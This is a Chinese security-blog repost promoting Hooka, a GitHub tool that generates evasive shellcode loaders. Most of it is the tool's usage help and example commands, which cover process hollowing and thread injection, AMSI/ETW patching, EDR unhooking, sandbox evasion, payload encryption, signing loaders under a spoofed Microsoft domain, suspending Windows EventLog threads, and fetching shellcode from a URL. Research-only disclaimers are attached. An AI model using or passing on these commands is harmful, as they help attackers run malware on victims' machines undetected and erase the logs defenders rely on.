多种功能的 Shellcode 加载器生成器 Hooka- Hooka

admin 2025年2月20日19:13:12评论20 views字数 3236阅读10分47秒阅读模式

01 项目地址

https://github.com/D3Ext/Hooka

02 项目介绍

Hooka 能够生成具有多种功能的 shellcode 加载器。它还基于其他工具,如BokuLoader、Freeze或Shhhloader,并尝试实现更多规避功能。为什么选择 Golang?虽然它不是恶意软件开发的完美语言,但它非常适合测试目的。显然,如果您想要专业且万无一失的东西,您应该用 C++、C# 或类似语言创建自己的加载器。

用法
Usage of Hooka:  REQUIRED:-i, --input string        payload to inject in raw format, as PE, as DLL or from a URL    -o, --output string       name of output file (i.e. loader.exe)    -f, --format string       format of the payload to generate (available: exe, dll) (default exe)  EXECUTION:    --proc string      process to spawn (in suspended state) when needed for given execution technique (default notepad.exe)    --exec string      technique used to load shellcode (default "SuspendedProcess"):                         SuspendedProcess                         ProcessHollowing                         NtCreateThreadEx                         EtwpCreateEtwThread                         NtQueueApcThreadEx                         No-RWX  AUXILIARY:    -a, --arch string       architecture of the loader to generate (default amd64)    -c, --cert string       certificate to sign generated loader with (i.e. cert.pfx)    -d, --domain string     domain used to sign loader (i.e. www.microsoft.com)  ENCODING:    --enc string         encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none)    --sgn                use Shikata Ga Nai to encode generated loader (it must be installed on path)    --strings            obfuscate strings using Caesar cipher  EVASION:    --unhook string         unhooking technique to use (available: full, peruns)    --sandbox               enable sandbox evasion    --no-amsi               don't patch AMSI    --no-etw                don't patch ETW    --hashing               use hashes to retrieve function pointers    --user string           proceed only when the user running the loader is the expected (i.e. DESKTOP-E1D6G0Aadmin)    --computername string   proceed only when the computer name is the expected (i.e. DESKTOP-E1D6G0A)    --acg                   enable ACG Guard to prevent AV/EDR from modifying existing executable code    --blockdlls             prevent non-Microsoft signed DLLs from injecting in child processes    --phantom               suspend EventLog threads using Phant0m technique. High privileges needed, otherwise loader skips this step    --sleep                 delay shellcode execution using a custom sleep function  EXTRA:    --calc              use a calc.exe shellcode to test loader capabilities (don't provide input file)    --compress          compress generated loader using Golang compiler and UPX if it's installed    -r, --rand          use a random set of parameters to create a random loader (just for testing purposes)    -v, --verbose       enable verbose to print extra information    -h, --help          print help panelExamples:  hooka -i shellcode.bin -o loader.exe  hooka -i http://192.168.1.126/shellcode.bin -o loader.exe  hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg  hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
生成一个简单的 EXE 加载器
$ hooka_linux_amd64 -i shellcode.bin -o loader.exe
生成 DLL 加载器
$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll
使用自定义配置(各种示例)
hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbosehooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdllshooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbosehooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0Atom" --computername "DESKTOP-E1D6G0A" --compress --strings
多种功能的 Shellcode 加载器生成器 Hooka- Hooka
多种功能的 Shellcode 加载器生成器 Hooka- Hooka
注:工具仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。信息及工具收集于互联网,真实性及安全性自测!!

原文始发于微信公众号(GSDK安全团队):多种功能的 Shellcode 加载器生成器 Hooka- Hooka

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月20日19:13:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   多种功能的 Shellcode 加载器生成器 Hooka- Hookahttps://cn-sec.com/archives/3763185.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息